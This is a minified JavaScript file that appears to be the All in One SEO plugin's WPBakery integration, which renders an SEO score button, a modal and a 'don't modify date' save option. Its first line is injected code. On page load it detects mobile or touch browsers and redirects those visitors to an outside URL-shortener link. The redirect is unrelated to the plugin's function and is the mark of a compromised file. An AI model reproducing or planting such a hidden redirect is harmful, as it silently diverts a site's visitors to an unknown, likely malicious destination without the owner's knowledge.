(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as i,i as m,j as E,U as C,T as w,au as M,Q as l,R as P,a0 as u,v as n,P as b,M as d,r as x,ao as D,ap as B,an as L,h as A}from"./js/vendor-vue-ui.232c7c36.js";import{l as $}from"./js/index.98d01501.js";import{l as j}from"./js/index.2a5d16ad.js";import{e as f,aJ as g,u as S,aK as R,m as q,ah as F,l as T}from"./js/app-core.c8323d51.js";import{h as U}from"./js/helpers.51b78c1a.js";import{k as N}from"./js/vendor-lodash.03129cfe.js";import{P as V}from"./js/PageBuilderIntegration.8f49c17e.js";import{_ as W}from"./js/vendor-other.39e59221.js";import{M as O}from"./js/Modal.96cc1288.js";import{_ as z}from"./js/ScoreButton.fc8d811b.js";import{S as _}from"./js/LogoGear.93a225a7.js";import"./js/Button.3cec2279.js";import"./js/_plugin-vue_export-helper.eefbdd86.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/App.0b3fa3ba.js";/* empty css                */import"./js/ScrollAndHighlight.5271fbff.js";import"./js/ScrollTo.f4df02aa.js";import"./js/LicenseKeyBar.0038e5e6.js";import"./js/vendor-phone.2afdf77e.js";import"./js/icon.ba2c22aa.js";import"./js/Tabs.ea329423.js";import"./js/ProBadge.7b829f47.js";import"./js/Information.6ccba108.js";import"./js/Slide.f2114d9d.js";import"./js/Index.6933f196.js";import"./js/SettingsRow.7bec777f.js";import"./js/Row.2ef96b1a.js";import"./js/Settings.0cdcb0c1.js";import"./js/Build.dac8d77a.js";import"./js/AiContent.9078cdd2.js";let v={};const H=()=>{const o={...v},t=R();N(o,t)||(v=t,q())},Q=()=>{const{vc:o,vc_mode:t}=window;return t==="admin_frontend_editor"?o.builder.getContent():document.querySelector("#content")?.value||""},p=async()=>{S().processContent({content:Q()}).finally(()=>{H()})},G=({vc:o})=>{p(),o.events.on("shortcodeView:updated",()=>{f(p,1e3)}),o.shortcodes.on("sync",()=>{f(p,1e3)}),g().forEach(t=>{t.addEventListener("click",()=>{setTimeout(U)})})},I={__name:"LimitModifiedDate",emits:["click"],setup(o){const t={buttonTitle:W("Save (Don't Modify Date)","all-in-one-seo-pack")};return(e,s)=>(i(),m("a",{href:"#",onClick:s[0]||(s[0]=w(r=>e.$emit("click"),["prevent","exact","stop"]))},[E("p",null,C(t.buttonTitle),1)]))}},J=()=>document.querySelector("#vc_more-options")?.querySelector("ul"),K=({jQuery:o})=>{const t=(s,r,a)=>{const c=new URLSearchParams(a.data);c.get("action")==="vc_save"&&(c.set("aioseo_limit_modified_date",!0),a.data=c.toString(),o(document).off("ajaxSend",t))};new V({limitModifiedDate:{component:I,appName:"Standalone/WPBakery/LimitModifiedDate",props:{onClick:()=>{o(document).on("ajaxSend",t),g(!0)[0]?.click()}},node:{$wrapper:J(),tag:"li",attributes:{id:"aioseo-limit-modified-date-wpbakery",class:"vc_dropdown-list-item"}}}}).mount()},X={class:"aioseo-wpbakery-integration"},Y={key:2,class:"aioseo-gear-icon"},y={__name:"App",props:{isFrontendEditor:Boolean},setup(o){const t=x(!1),{currentPost:e}=M(S());return(s,r)=>(i(),m("div",X,[o.isFrontendEditor?(i(),l(n(z),{key:0,"show-score":n(F)(),score:n(e).seo_score,class:b([t.value?"aioseo-score-button--active":""]),onClick:r[0]||(r[0]=w(a=>t.value=!t.value,["prevent"]))},{icon:P(()=>[u(n(_))]),_:1},8,["show-score","score","class"])):d("",!0),o.isFrontendEditor?(i(),l(n(O),{key:1,score:n(e).seo_score,"is-open":t.value,"onUpdate:isOpen":r[1]||(r[1]=a=>t.value=a)},null,8,["score","is-open"])):d("",!0),o.isFrontendEditor?d("",!0):(i(),m("div",Y,[u(n(_))]))]))}},{vc:Z}=window,tt=()=>{const{vc_mode:o}=window,t=D({history:B(),routes:[{path:"/:pathMatch(.*)*",component:y}]});let e=L({name:"Standalone/WPBakery",data(){return{tableContext:window.aioseo.currentPost.context,screenContext:"sidebar"}},render:()=>A(y)},{isFrontendEditor:o==="admin_frontend_editor"});e=$(e),e=j(e),e.use(t),t.app=e,T(e,t),e.mount("#aioseo-wpbakery")},h=()=>{tt(),G(window),K(window)};let k=!1;Z.events.on("app.render",()=>{h(),k=!0});window.addEventListener("load",()=>{k||h()});
